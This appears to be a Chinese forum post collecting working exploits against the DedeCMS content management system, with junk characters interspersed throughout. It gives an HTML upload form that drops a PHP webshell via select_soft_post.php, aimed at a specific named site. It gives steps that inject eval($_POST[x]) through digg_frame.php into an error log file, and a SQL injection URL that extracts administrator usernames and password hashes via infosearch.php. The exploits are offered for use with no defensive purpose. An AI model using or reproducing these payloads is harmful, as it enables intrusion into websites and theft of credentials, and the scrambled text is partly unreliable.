" B, y# p {) F, R( X, J1 N
4 }5 _# {9 W* A
2 q% Z9 {/ z" B, Z4 Y; n0 T9 T) J) U! C0 O' H" j, m" f
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
( |- w+ O* E8 b& f7 Z& n, a<html>
7 {1 p+ L* P4 d4 J3 X<head>. Q* j2 Y) G5 L! ^
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
2 a& Q+ g {+ t; a" B</head>2 n. y, J! U+ X$ e5 {
<body style="FONT-SIZE: 9pt">
8 ]" |) U' ~: @: b3 y7 R---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />6 ^4 h2 Q6 H! E, |; l
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
; j: {2 Z( Z# D* T! |& r9 x! p<input type='hidden' name='activepath' value='/data/cache/' />
/ z" m; ?& a* X7 Y$ C<input type='hidden' name='cfg_basedir' value='../../' />5 e* t" d& f4 g
<input type='hidden' name='cfg_imgtype' value='php' />; n- E. w* ^9 P O) u2 Z. \
<input type='hidden' name='cfg_not_allowall' value='txt' />: K5 @9 W! J+ @
<input type='hidden' name='cfg_softtype' value='php' />
% `# s0 u- {, E: D h3 B, ?<input type='hidden' name='cfg_mediatype' value='php' />: {& M. w! \! }, Y
<input type='hidden' name='f' value='form1.enclosure' />
1 ~$ S; u' s) b/ `<input type='hidden' name='job' value='upload' />
4 |' F* d5 Y& I |6 @<input type='hidden' name='newname' value='fly.php' />
9 e! F: ^0 U" y9 w3 ?Select U Shell <input type='file' name='uploadfile' size='25' />
" M2 H( x1 M$ a. `9 e7 F<input type='submit' name='sb1' value='确定' />1 ]9 n5 `* G5 D6 W
</form>
) ~2 {8 b' c2 Q& Z' y<br />It's just a exp for the bug of Dedecms V55...<br />
. G: m3 x/ [/ r1 ENeed register_globals = on...<br />
/ ~' L/ k! t7 q3 F, J3 O1 O, `; YFun the game,get a webshell at /data/cache/fly.php...<br />: K$ ^! E# e3 A& \" d( a
</body>% F: j* w6 F+ t# i
</html>
- a8 j! M' B2 R. D4 j+ C! t; [( H3 N! {2 U8 F) [. y
& i2 i* i6 F; R" O8 e
' P* F# I) X9 u$ j7 b
/ s; V% z2 w( w+ e6 x
, c( y/ b0 M" y7 d- ?' O
- Z4 n5 y3 p. ?" N% U7 \0 i0 [' L6 _! w
1 |4 O& V' F1 q3 P$ A- }. l
3 a; J; B6 T6 ?' h% Q: x
2 P& U/ ^; U. U( O' w# u W织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
7 V3 h! J" l6 h2 e! s利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。# w9 D5 ^) x$ r2 s$ }* D: L) X
1. 访问网址:, q1 |, z0 _$ E) h5 j. E
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>7 X( U2 t/ v& s: j
可看见错误信息2 g o4 r e, T0 x ~2 P' T
& @3 U* G1 ?4 V- p& D' f0 s4 @5 z8 `9 @* T
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。" [/ P. `7 u; R9 a) Y% P& E1 n: [
int(3) Error: Illegal double '1024e1024' value found during parsing
7 {2 n3 V- |, IError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
r+ ^ l$ v7 ]* T# b7 j6 U8 |( U9 g! j; D+ |: I9 r; H" E, g; l1 G
) Q4 X" \6 t2 i) ^3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是3 X, O4 L0 n9 _, G5 b5 _' y; v& i
, r1 P* I" u! C6 C6 l
$ m7 X) Z& y+ I- ?) _) `<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>+ b6 c6 Q" B# k+ o! _2 f( Q
/ k! p6 ^' x- m
* H! k' d% L; l4 n& ?
按确定后的看到第2步骤的信息表示文件木马上传成功.! O; N) Q; o1 n6 V
( k0 F6 j& J# t5 E* [4 G ^
3 E& h, C, |3 U/ e; Q7 N7 f3 M1 o- ~
; R0 P$ C+ i; h* K/ q/ f, O4 x$ C6 w* H
: g2 |& i t4 ~ c1 ^
* V: b, V. {0 w3 B1 |- m! D
* b3 z, `7 q7 v P. c3 Q4 G2 f
0 n- }# p# A. k1 o+ n0 R1 O! |7 I! @
* {: |! h5 j0 h& p
" J5 A! X' c, N6 W织梦(DedeCms)plus/infosearch.php 文件注入漏洞
1 X; j4 Z3 I. nhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对